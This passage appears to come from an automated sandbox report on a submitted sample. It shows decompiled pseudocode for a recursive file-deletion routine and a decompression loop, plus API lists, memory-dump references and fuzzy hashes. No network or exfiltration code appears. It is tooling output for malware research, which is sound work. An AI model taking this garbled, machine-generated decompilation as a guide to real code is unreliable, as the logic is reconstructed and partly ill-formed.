                                                              								} else {
                                                              									__eflags = (_a8 & 0x00000003) - 3;
                                                              									if(__eflags == 0) {
                                                              										E00405D74(__eflags, _t68, _a8);
                                                              									}
                                                              								}
                                                              								goto L24;
                                                              							}
                                                              							__eflags = _v558;
                                                              							if(_v558 == 0) {
                                                              								goto L24;
                                                              							}
                                                              							__eflags = _v558 - 0x2e;
                                                              							if(_v558 != 0x2e) {
                                                              								goto L16;
                                                              							}
                                                              							__eflags = _v556;
                                                              							if(_v556 == 0) {
                                                              								goto L24;
                                                              							}
                                                              							goto L16;
                                                              							L24:
                                                              							_t55 = FindNextFileW(_t70,  &_v604);
                                                              							__eflags = _t55;
                                                              						} while (_t55 != 0);
                                                              						_t38 = FindClose(_t70);
                                                              						goto L26;
                                                              					}
                                                              					__eflags =  *0x425750 - 0x5c;
                                                              					if( *0x425750 != 0x5c) {
                                                              						goto L11;
                                                              					}
                                                              					goto L10;
                                                              				} else {
                                                              					__eflags = _t38;
                                                              					if(_t38 == 0) {
                                                              						L28:
                                                              						__eflags = _a4;
                                                              						if(_a4 == 0) {
                                                              							L36:
                                                              							return _t38;
                                                              						}
                                                              						__eflags = _v12;
                                                              						if(_v12 != 0) {
                                                              							_t38 = E0040699E(_t68);
                                                              							__eflags = _t38;
                                                              							if(_t38 == 0) {
                                                              								goto L36;
                                                              							}
                                                              							E00405F37(_t68);
                                                              							_t38 = E00405D2C(__eflags, _t68, _v8 | 0x00000001);
                                                              							__eflags = _t38;
                                                              							if(_t38 != 0) {
                                                              								return E004056CA(0xffffffe5, _t68);
                                                              							}
                                                              							__eflags = _v8;
                                                              							if(_v8 == 0) {
                                                              								goto L30;
                                                              							}
                                                              							E004056CA(0xfffffff1, _t68);
                                                              							return E00406428(_t67, _t68, 0);
                                                              						}
                                                              						L30:
                                                              						 *0x42a2e8 =  *0x42a2e8 + 1;
                                                              						return _t38;
                                                              					}
                                                              					__eflags = _t65 & 0x00000002;
                                                              					if((_t65 & 0x00000002) == 0) {
                                                              						goto L28;
                                                              					}
                                                              					goto L5;
                                                              				}
                                                              			}


















                                                              0x00405d7e
                                                              0x00405d83
                                                              0x00405d8c
                                                              0x00405d8f
                                                              0x00405d97
                                                              0x00405d9a
                                                              0x00405d9d
                                                              0x00405da5
                                                              0x00405da7
                                                              0x00405da8
                                                              0x00000000
                                                              0x00405da8
                                                              0x00405db3
                                                              0x00405db6
                                                              0x00405db6
                                                              0x00405db6
                                                              0x00405dba
                                                              0x00405dcd
                                                              0x00405dd4
                                                              0x00405dd9
                                                              0x00405ddd
                                                              0x00405ded
                                                              0x00405ddf
                                                              0x00405de5
                                                              0x00405de5
                                                              0x00405df2
                                                              0x00405df6
                                                              0x00405e02
                                                              0x00405e08
                                                              0x00405e0d
                                                              0x00405e13
                                                              0x00405e1e
                                                              0x00405e24
                                                              0x00405e26
                                                              0x00405e29
                                                              0x00405ed3
                                                              0x00405ed3
                                                              0x00405ed7
                                                              0x00405ed9
                                                              0x00405ed9
                                                              0x00405ed9
                                                              0x00405ed9
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00405e2f
                                                              0x00405e2f
                                                              0x00405e2f
                                                              0x00405e37
                                                              0x00405e57
                                                              0x00405e5f
                                                              0x00405e64
                                                              0x00405e6b
                                                              0x00405e86
                                                              0x00405e8b
                                                              0x00405e8d
                                                              0x00405eb1
                                                              0x00405e8f
                                                              0x00405e8f
                                                              0x00405e92
                                                              0x00405ea6
                                                              0x00405e94
                                                              0x00405e97
                                                              0x00405e9f
                                                              0x00405e9f
                                                              0x00405e92
                                                              0x00405e6d
                                                              0x00405e73
                                                              0x00405e75
                                                              0x00405e7b
                                                              0x00405e7b
                                                              0x00405e75
                                                              0x00000000
                                                              0x00405e6b
                                                              0x00405e39
                                                              0x00405e41
                                                              0x00000000
                                                              0x00000000
                                                              0x00405e43
                                                              0x00405e4b
                                                              0x00000000
                                                              0x00000000
                                                              0x00405e4d
                                                              0x00405e55
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00405eb6
                                                              0x00405ebe
                                                              0x00405ec4
                                                              0x00405ec4
                                                              0x00405ecd
                                                              0x00000000
                                                              0x00405ecd
                                                              0x00405df8
                                                              0x00405e00
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00405dbc
                                                              0x00405dbc
                                                              0x00405dbe
                                                              0x00405ede
                                                              0x00405ee0
                                                              0x00405ee3
                                                              0x00405f34
                                                              0x00405f34
                                                              0x00405f34
                                                              0x00405ee5
                                                              0x00405ee8
                                                              0x00405ef3
                                                              0x00405ef8
                                                              0x00405efa
                                                              0x00000000
                                                              0x00000000
                                                              0x00405efd
                                                              0x00405f09
                                                              0x00405f0e
                                                              0x00405f10
                                                              0x00000000
                                                              0x00405f2b
                                                              0x00405f12
                                                              0x00405f15
                                                              0x00000000
                                                              0x00000000
                                                              0x00405f1a
                                                              0x00000000
                                                              0x00405f21
                                                              0x00405eea
                                                              0x00405eea
                                                              0x00000000
                                                              0x00405eea
                                                              0x00405dc4
                                                              0x00405dc7
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00405dc7

                                                              APIs
                                                              • DeleteFileW.KERNELBASE(?,?,76083420,76082EE0,00000000), ref: 00405D9D
                                                              • lstrcatW.KERNEL32(00425750,\*.*), ref: 00405DE5
                                                              • lstrcatW.KERNEL32(?,0040A014), ref: 00405E08
                                                              • lstrlenW.KERNEL32(?,?,0040A014,?,00425750,?,?,76083420,76082EE0,00000000), ref: 00405E0E
                                                              • FindFirstFileW.KERNELBASE(00425750,?,?,?,0040A014,?,00425750,?,?,76083420,76082EE0,00000000), ref: 00405E1E
                                                              • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EBE
                                                              • FindClose.KERNEL32(00000000), ref: 00405ECD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62476622209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.62476602151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476669365.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476694126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476810062.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476831650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476858457.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476897766.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476926851.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62477011869.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                              • String ID: .$.$PWB$\*.*
                                                              • API String ID: 2035342205-2468439962
                                                              • Opcode ID: 474154096caf6e50bc49cf7df5fd00662d051eb5e935454ecd5fbb37efa04323
                                                              • Instruction ID: 3801e3340fbbb9c460ab277ab089a7ece50ce31247a5b640c745bca9484d7288
                                                              • Opcode Fuzzy Hash: 474154096caf6e50bc49cf7df5fd00662d051eb5e935454ecd5fbb37efa04323
                                                              • Instruction Fuzzy Hash: 46410330800A15AADB21AB61CC49BBF7678EF41715F50413FF881711D1DB7C4A82CEAE
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 98%
                                                              			E00406D5F() {
                                                              				unsigned short _t531;
                                                              				signed int _t532;
                                                              				void _t533;
                                                              				void* _t534;
                                                              				signed int _t535;
                                                              				signed int _t565;
                                                              				signed int _t568;
                                                              				signed int _t590;
                                                              				signed int* _t607;
                                                              				void* _t614;
                                                              
                                                              				L0:
                                                              				while(1) {
                                                              					L0:
                                                              					if( *(_t614 - 0x40) != 0) {
                                                              						 *(_t614 - 0x34) = 1;
                                                              						 *(_t614 - 0x84) = 7;
                                                              						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
                                                              						L132:
                                                              						 *(_t614 - 0x54) = _t607;
                                                              						L133:
                                                              						_t531 =  *_t607;
                                                              						_t590 = _t531 & 0x0000ffff;
                                                              						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
                                                              						if( *(_t614 - 0xc) >= _t565) {
                                                              							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
                                                              							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
                                                              							 *(_t614 - 0x40) = 1;
                                                              							_t532 = _t531 - (_t531 >> 5);
                                                              							 *_t607 = _t532;
                                                              						} else {
                                                              							 *(_t614 - 0x10) = _t565;
                                                              							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                                                              							 *_t607 = (0x800 - _t590 >> 5) + _t531;
                                                              						}
                                                              						if( *(_t614 - 0x10) >= 0x1000000) {
                                                              							L139:
                                                              							_t533 =  *(_t614 - 0x84);
                                                              							L140:
                                                              							 *(_t614 - 0x88) = _t533;
                                                              							goto L1;
                                                              						} else {
                                                              							L137:
                                                              							if( *(_t614 - 0x6c) == 0) {
                                                              								 *(_t614 - 0x88) = 5;
                                                              								goto L170;
                                                              							}
                                                              							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
                                                              							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                              							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                              							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                                                              							goto L139;
                                                              						}
                                                              					} else {
                                                              						__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                              						__esi =  *(__ebp - 0x60);
                                                              						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                              						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                              						__ecx =  *(__ebp - 0x3c);
                                                              						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                              						__ecx =  *(__ebp - 4);
                                                              						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                              						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                              						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                              						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                              						if( *(__ebp - 0x38) >= 4) {
                                                              							if( *(__ebp - 0x38) >= 0xa) {
                                                              								_t97 = __ebp - 0x38;
                                                              								 *_t97 =  *(__ebp - 0x38) - 6;
                                                              							} else {
                                                              								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                              							}
                                                              						} else {
                                                              							 *(__ebp - 0x38) = 0;
                                                              						}
                                                              						if( *(__ebp - 0x34) == __edx) {
                                                              							__ebx = 0;
                                                              							__ebx = 1;
                                                              							L60:
                                                              							__eax =  *(__ebp - 0x58);
                                                              							__edx = __ebx + __ebx;
                                                              							__ecx =  *(__ebp - 0x10);
                                                              							__esi = __edx + __eax;
                                                              							__ecx =  *(__ebp - 0x10) >> 0xb;
                                                              							__ax =  *__esi;
                                                              							 *(__ebp - 0x54) = __esi;
                                                              							__edi = __ax & 0x0000ffff;
                                                              							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                              							if( *(__ebp - 0xc) >= __ecx) {
                                                              								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                              								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                              								__cx = __ax;
                                                              								_t216 = __edx + 1; // 0x1
                                                              								__ebx = _t216;
                                                              								__cx = __ax >> 5;
                                                              								 *__esi = __ax;
                                                              							} else {
                                                              								 *(__ebp - 0x10) = __ecx;
                                                              								0x800 = 0x800 - __edi;
                                                              								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                              								__ebx = __ebx + __ebx;
                                                              								 *__esi = __cx;
                                                              							}
                                                              							 *(__ebp - 0x44) = __ebx;
                                                              							if( *(__ebp - 0x10) >= 0x1000000) {
                                                              								L59:
                                                              								if(__ebx >= 0x100) {
                                                              									goto L54;
                                                              								}
                                                              								goto L60;
                                                              							} else {
                                                              								L57:
                                                              								if( *(__ebp - 0x6c) == 0) {
                                                              									 *(__ebp - 0x88) = 0xf;
                                                              									goto L170;
                                                              								}
                                                              								__ecx =  *(__ebp - 0x70);
                                                              								__eax =  *(__ebp - 0xc);
                                                              								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                              								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                              								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              								_t202 = __ebp - 0x70;
                                                              								 *_t202 =  *(__ebp - 0x70) + 1;
                                                              								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              								goto L59;
                                                              							}
                                                              						} else {
                                                              							__eax =  *(__ebp - 0x14);
                                                              							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                              							if(__eax >=  *(__ebp - 0x74)) {
                                                              								__eax = __eax +  *(__ebp - 0x74);
                                                              							}
                                                              							__ecx =  *(__ebp - 8);
                                                              							__ebx = 0;
                                                              							__ebx = 1;
                                                              							__al =  *((intOrPtr*)(__eax + __ecx));
                                                              							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                              							L40:
                                                              							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                              							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                              							__ecx =  *(__ebp - 0x58);
                                                              							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                              							 *(__ebp - 0x48) = __eax;
                                                              							__eax = __eax + 1;
                                                              							__eax = __eax << 8;
                                                              							__eax = __eax + __ebx;
                                                              							__esi =  *(__ebp - 0x58) + __eax * 2;
                                                              							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                              							__ax =  *__esi;
                                                              							 *(__ebp - 0x54) = __esi;
                                                              							__edx = __ax & 0x0000ffff;
                                                              							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                              							if( *(__ebp - 0xc) >= __ecx) {
                                                              								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                              								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                              								__cx = __ax;
                                                              								 *(__ebp - 0x40) = 1;
                                                              								__cx = __ax >> 5;
                                                              								__ebx = __ebx + __ebx + 1;
                                                              								 *__esi = __ax;
                                                              							} else {
                                                              								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                              								 *(__ebp - 0x10) = __ecx;
                                                              								0x800 = 0x800 - __edx;
                                                              								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                              								__ebx = __ebx + __ebx;
                                                              								 *__esi = __cx;
                                                              							}
                                                              							 *(__ebp - 0x44) = __ebx;
                                                              							if( *(__ebp - 0x10) >= 0x1000000) {
                                                              								L38:
                                                              								__eax =  *(__ebp - 0x40);
                                                              								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                              									while(1) {
                                                              										if(__ebx >= 0x100) {
                                                              											break;
                                                              										}
                                                              										__eax =  *(__ebp - 0x58);
                                                              										__edx = __ebx + __ebx;
                                                              										__ecx =  *(__ebp - 0x10);
                                                              										__esi = __edx + __eax;
                                                              										__ecx =  *(__ebp - 0x10) >> 0xb;
                                                              										__ax =  *__esi;
                                                              										 *(__ebp - 0x54) = __esi;
                                                              										__edi = __ax & 0x0000ffff;
                                                              										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                              										if( *(__ebp - 0xc) >= __ecx) {
                                                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                              											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                              											__cx = __ax;
                                                              											_t169 = __edx + 1; // 0x1
                                                              											__ebx = _t169;
                                                              											__cx = __ax >> 5;
                                                              											 *__esi = __ax;
                                                              										} else {
                                                              											 *(__ebp - 0x10) = __ecx;
                                                              											0x800 = 0x800 - __edi;
                                                              											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                              											__ebx = __ebx + __ebx;
                                                              											 *__esi = __cx;
                                                              										}
                                                              										 *(__ebp - 0x44) = __ebx;
                                                              										if( *(__ebp - 0x10) < 0x1000000) {
                                                              											L45:
                                                              											if( *(__ebp - 0x6c) == 0) {
                                                              												 *(__ebp - 0x88) = 0xe;
                                                              												goto L170;
                                                              											}
                                                              											__ecx =  *(__ebp - 0x70);
                                                              											__eax =  *(__ebp - 0xc);
                                                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              											_t155 = __ebp - 0x70;
                                                              											 *_t155 =  *(__ebp - 0x70) + 1;
                                                              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              										}
                                                              									}
                                                              									L53:
                                                              									_t172 = __ebp - 0x34;
                                                              									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
                                                              									L54:
                                                              									__al =  *(__ebp - 0x44);
                                                              									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                              									L55:
                                                              									if( *(__ebp - 0x64) == 0) {
                                                              										 *(__ebp - 0x88) = 0x1a;
                                                              										goto L170;
                                                              									}
                                                              									__ecx =  *(__ebp - 0x68);
                                                              									__al =  *(__ebp - 0x5c);
                                                              									__edx =  *(__ebp - 8);
                                                              									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                              									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                              									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                              									 *( *(__ebp - 0x68)) = __al;
                                                              									__ecx =  *(__ebp - 0x14);
                                                              									 *(__ecx +  *(__ebp - 8)) = __al;
                                                              									__eax = __ecx + 1;
                                                              									__edx = 0;
                                                              									_t191 = __eax %  *(__ebp - 0x74);
                                                              									__eax = __eax /  *(__ebp - 0x74);
                                                              									__edx = _t191;
                                                              									L79:
                                                              									 *(__ebp - 0x14) = __edx;
                                                              									L80:
                                                              									 *(__ebp - 0x88) = 2;
                                                              									goto L1;
                                                              								}
                                                              								if(__ebx >= 0x100) {
                                                              									goto L53;
                                                              								}
                                                              								goto L40;
                                                              							} else {
                                                              								L36:
                                                              								if( *(__ebp - 0x6c) == 0) {
                                                              									 *(__ebp - 0x88) = 0xd;
                                                              									L170:
                                                              									_t568 = 0x22;
                                                              									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
                                                              									_t535 = 0;
                                                              									L172:
                                                              									return _t535;
                                                              								}
                                                              								__ecx =  *(__ebp - 0x70);
                                                              								__eax =  *(__ebp - 0xc);
                                                              								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                              								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                              								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              								_t121 = __ebp - 0x70;
                                                              								 *_t121 =  *(__ebp - 0x70) + 1;
                                                              								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              								goto L38;
                                                              							}
                                                              						}
                                                              					}
                                                              					L1:
                                                              					_t534 =  *(_t614 - 0x88);
                                                              					if(_t534 > 0x1c) {
                                                              						L171:
                                                              						_t535 = _t534 | 0xffffffff;
                                                              						goto L172;
                                                              					}
                                                              					switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
                                                              						case 0:
                                                              							if( *(_t614 - 0x6c) == 0) {
                                                              								goto L170;
                                                              							}
                                                              							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                              							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                              							_t534 =  *( *(_t614 - 0x70));
                                                              							if(_t534 > 0xe1) {
                                                              								goto L171;
                                                              							}
                                                              							_t538 = _t534 & 0x000000ff;
                                                              							_push(0x2d);
                                                              							asm("cdq");
                                                              							_pop(_t570);
                                                              							_push(9);
                                                              							_pop(_t571);
                                                              							_t610 = _t538 / _t570;
                                                              							_t540 = _t538 % _t570 & 0x000000ff;
                                                              							asm("cdq");
                                                              							_t605 = _t540 % _t571 & 0x000000ff;
                                                              							 *(_t614 - 0x3c) = _t605;
                                                              							 *(_t614 - 0x1c) = (1 << _t610) - 1;
                                                              							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                              							_t613 = (0x300 << _t605 + _t610) + 0x736;
                                                              							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
                                                              								L10:
                                                              								if(_t613 == 0) {
                                                              									L12:
                                                              									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
                                                              									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                                                              									goto L15;
                                                              								} else {
                                                              									goto L11;
                                                              								}
                                                              								do {
                                                              									L11:
                                                              									_t613 = _t613 - 1;
                                                              									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
                                                              								} while (_t613 != 0);
                                                              								goto L12;
                                                              							}
                                                              							if( *(_t614 - 4) != 0) {
                                                              								GlobalFree( *(_t614 - 4));
                                                              							}
                                                              							_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                              							 *(_t614 - 4) = _t534;
                                                              							if(_t534 == 0) {
                                                              								goto L171;
                                                              							} else {
                                                              								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
                                                              								goto L10;
                                                              							}
                                                              						case 1:
                                                              							L13:
                                                              							__eflags =  *(_t614 - 0x6c);
                                                              							if( *(_t614 - 0x6c) == 0) {
                                                              								 *(_t614 - 0x88) = 1;
                                                              								goto L170;
                                                              							}
                                                              							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                              							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
                                                              							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                              							_t45 = _t614 - 0x48;
                                                              							 *_t45 =  *(_t614 - 0x48) + 1;
                                                              							__eflags =  *_t45;
                                                              							L15:
                                                              							if( *(_t614 - 0x48) < 4) {
                                                              								goto L13;
                                                              							}
                                                              							_t546 =  *(_t614 - 0x40);
                                                              							if(_t546 ==  *(_t614 - 0x74)) {
                                                              								L20:
                                                              								 *(_t614 - 0x48) = 5;
                                                              								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
                                                              								goto L23;
                                                              							}
                                                              							 *(_t614 - 0x74) = _t546;
                                                              							if( *(_t614 - 8) != 0) {
                                                              								GlobalFree( *(_t614 - 8));
                                                              							}
                                                              							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
                                                              							 *(_t614 - 8) = _t534;
                                                              							if(_t534 == 0) {
                                                              								goto L171;
                                                              							} else {
                                                              								goto L20;
                                                              							}
                                                              						case 2:
                                                              							L24:
                                                              							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
                                                              							 *(_t614 - 0x84) = 6;
                                                              							 *(_t614 - 0x4c) = _t553;
                                                              							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
                                                              							goto L132;
                                                              						case 3:
                                                              							L21:
                                                              							__eflags =  *(_t614 - 0x6c);
                                                              							if( *(_t614 - 0x6c) == 0) {
                                                              								 *(_t614 - 0x88) = 3;
                                                              								goto L170;
                                                              							}
                                                              							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                              							_t67 = _t614 - 0x70;
                                                              							 *_t67 =  &(( *(_t614 - 0x70))[1]);
                                                              							__eflags =  *_t67;
                                                              							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                                                              							L23:
                                                              							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
                                                              							if( *(_t614 - 0x48) != 0) {
                                                              								goto L21;
                                                              							}
                                                              							goto L24;
                                                              						case 4:
                                                              							goto L133;
                                                              						case 5:
                                                              							goto L137;
                                                              						case 6:
                                                              							goto L0;
                                                              						case 7:
                                                              							__eflags =  *(__ebp - 0x40) - 1;
                                                              							if( *(__ebp - 0x40) != 1) {
                                                              								__eax =  *(__ebp - 0x24);
                                                              								 *(__ebp - 0x80) = 0x16;
                                                              								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                              								__eax =  *(__ebp - 0x28);
                                                              								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                              								__eax =  *(__ebp - 0x2c);
                                                              								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                              								__eax = 0;
                                                              								__eflags =  *(__ebp - 0x38) - 7;
                                                              								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                              								__al = __al & 0x000000fd;
                                                              								__eax = (__eflags >= 0) - 1 + 0xa;
                                                              								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                              								__eax =  *(__ebp - 4);
                                                              								__eax =  *(__ebp - 4) + 0x664;
                                                              								__eflags = __eax;
                                                              								 *(__ebp - 0x58) = __eax;
                                                              								goto L68;
                                                              							}
                                                              							__eax =  *(__ebp - 4);
                                                              							__ecx =  *(__ebp - 0x38);
                                                              							 *(__ebp - 0x84) = 8;
                                                              							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                              							goto L132;
                                                              						case 8:
                                                              							__eflags =  *(__ebp - 0x40);
                                                              							if( *(__ebp - 0x40) != 0) {
                                                              								__eax =  *(__ebp - 4);
                                                              								__ecx =  *(__ebp - 0x38);
                                                              								 *(__ebp - 0x84) = 0xa;
                                                              								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                              							} else {
                                                              								__eax =  *(__ebp - 0x38);
                                                              								__ecx =  *(__ebp - 4);
                                                              								__eax =  *(__ebp - 0x38) + 0xf;
                                                              								 *(__ebp - 0x84) = 9;
                                                              								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                              								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                              							}
                                                              							goto L132;
                                                              						case 9:
                                                              							__eflags =  *(__ebp - 0x40);
                                                              							if( *(__ebp - 0x40) != 0) {
                                                              								goto L89;
                                                              							}
                                                              							__eflags =  *(__ebp - 0x60);
                                                              							if( *(__ebp - 0x60) == 0) {
                                                              								goto L171;
                                                              							}
                                                              							__eax = 0;
                                                              							__eflags =  *(__ebp - 0x38) - 7;
                                                              							_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                              							__eflags = _t258;
                                                              							0 | _t258 = _t258 + _t258 + 9;
                                                              							 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                              							goto L75;
                                                              						case 0xa:
                                                              							__eflags =  *(__ebp - 0x40);
                                                              							if( *(__ebp - 0x40) != 0) {
                                                              								__eax =  *(__ebp - 4);
                                                              								__ecx =  *(__ebp - 0x38);
                                                              								 *(__ebp - 0x84) = 0xb;
                                                              								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                              								goto L132;
                                                              							}
